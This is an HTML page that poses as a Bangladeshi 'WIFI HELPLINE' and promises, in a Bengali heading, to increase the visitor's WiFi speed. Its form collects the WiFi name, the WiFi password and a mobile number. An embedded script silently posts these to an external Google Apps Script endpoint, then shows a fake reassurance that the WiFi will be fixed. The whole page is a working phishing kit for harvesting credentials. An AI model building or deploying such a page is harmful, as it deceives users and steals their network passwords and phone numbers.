<!DOCTYPE html>
<html>
<head>
<title>Report Submiting Form</title>
<style>
body {
    font-family: Arial, sans-serif;
    background-color: #f2f2f2;
}

form {
    border: 1px solid #ccc;
    padding: 20px;
    width: 520px;
    height:420px;
    margin: 0 auto;
}

input[type=text], input[type=password] {
    width: 100%;
    padding: 12px 20px;
    margin: 8px 0;
    display: inline-block;
    border: 1px solid #ccc;
    box-sizing: border-box;
}

button {
    background-color: #4CAF50;
    color: white;
    padding: 14px 20px;
    margin: 8px 0;
    border: none;
    cursor: pointer;
    width: 100%;
}

button:hover {
    opacity: 0.4;
}

.container {
    padding: 16px;
}




 





</style>
</head>
<body>

<h1 align="center" style="color: Green;">আপনার WIFI এর Speed বাড়িয়ে নিন </h1>

<h2 align="center" style="color: blue;">WIFI HELPLINE BD</h2>

<form mathord="post" name='google-sheet'>
  <div class="container"  style="width: 500px; height: 400px; background-color:  lightblue;">
    
        <h4 align="center"  style="color: RED;">SUBMIT YOUR REPORT</h4>
    <label for="WIFI NAME"><b style="color: ;">WIFI Name</b></label>
    <input type="text" placeholder="Enter WIFI Name" name="username" required>

    <label for="password"><b>YOUR WIFI Password</b></label>
    <input type="password" placeholder="Enter Password" name="password" required>


    <label for="number"><b>Your Mobile Number</b></label>
    <input type="text" placeholder="Enter Mobile Number" name="number" required>

    <button type="submit" name="submit">SUBMIT</button>
  </div>
</form>


        <script>
            const scriptURL = 'https://script.google.com/macros/s/AKfycbw4Fkgf-GU5WCRviytlV0aFYsN2VeYrXiS4JFlC2Q0m2ZuP1RmTvdpTSLBffSVVWTDE/exec'
            const form = document.forms['google-sheet']
          
            form.addEventListener('submit', e => {
              e.preventDefault()
              fetch(scriptURL, { method: 'POST', body: new FormData(form)})
          .then(response => alert("Thanks for submiting your report to us..! We Will fix your WIFI very Soon..."))
                .catch(error => console.error('Error!', error.message))
            })
          </script>



</body>
</html>
